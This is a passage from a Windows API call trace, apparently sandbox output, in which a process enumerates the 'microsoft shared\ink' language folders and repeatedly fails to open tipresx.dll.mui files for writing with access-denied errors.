dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0098.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0098.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.575] AreFileApisANSI () returned 1 [0098.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0098.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0098.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0098.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.575] AreFileApisANSI () returned 1 [0098.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0098.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 73 [0098.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.575] GetFileType (hFile=0x368) returned 0x1 [0098.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0098.576] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.576] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.576] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.576] CloseHandle (hObject=0x368) returned 1 [0098.576] AreFileApisANSI () returned 1 [0098.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0098.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 73 [0098.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.577] GetLastError () returned 0x5 [0098.577] GetLastError () returned 0x5 [0098.577] SetLastError (dwErrCode=0x5) [0098.577] GetLastError () returned 0x5 [0098.577] SetLastError (dwErrCode=0x5) [0098.577] GetLastError () returned 0x5 [0098.577] SetLastError (dwErrCode=0x5) [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0098.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.577] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d030, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0098.577] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0098.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0098.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0098.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0098.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.705] AreFileApisANSI () returned 1 [0098.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE", lpUsedDefaultChar=0x0) returned 57 [0098.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0098.705] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.705] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.705] AreFileApisANSI () returned 1 [0098.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0098.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 57 [0098.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.705] GetLastError () returned 0x5 [0098.705] GetLastError () returned 0x5 [0098.705] SetLastError (dwErrCode=0x5) [0098.705] GetLastError () returned 0x5 [0098.706] SetLastError (dwErrCode=0x5) [0098.706] GetLastError () returned 0x5 [0098.706] SetLastError (dwErrCode=0x5) [0098.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0098.706] AreFileApisANSI () returned 1 [0098.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0098.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 57 [0098.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.706] GetLastError () returned 0x5 [0098.706] GetLastError () returned 0x5 [0098.706] SetLastError (dwErrCode=0x5) [0098.706] GetLastError () returned 0x5 [0098.706] SetLastError (dwErrCode=0x5) [0098.706] GetLastError () returned 0x5 [0098.706] SetLastError (dwErrCode=0x5) [0098.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0098.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0098.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0098.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0098.707] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.707] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78290 [0098.707] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.707] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0098.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0098.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0098.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.708] AreFileApisANSI () returned 1 [0098.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0098.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.708] AreFileApisANSI () returned 1 [0098.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0098.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 73 [0098.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.709] GetFileType (hFile=0x27c) returned 0x1 [0098.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0098.709] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.709] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.709] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.709] CloseHandle (hObject=0x27c) returned 1 [0098.710] AreFileApisANSI () returned 1 [0098.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85d00 [0098.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 73 [0098.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.710] GetLastError () returned 0x5 [0098.710] GetLastError () returned 0x5 [0098.710] SetLastError (dwErrCode=0x5) [0098.710] GetLastError () returned 0x5 [0098.710] SetLastError (dwErrCode=0x5) [0098.710] GetLastError () returned 0x5 [0098.710] SetLastError (dwErrCode=0x5) [0098.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0098.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0098.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.710] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, 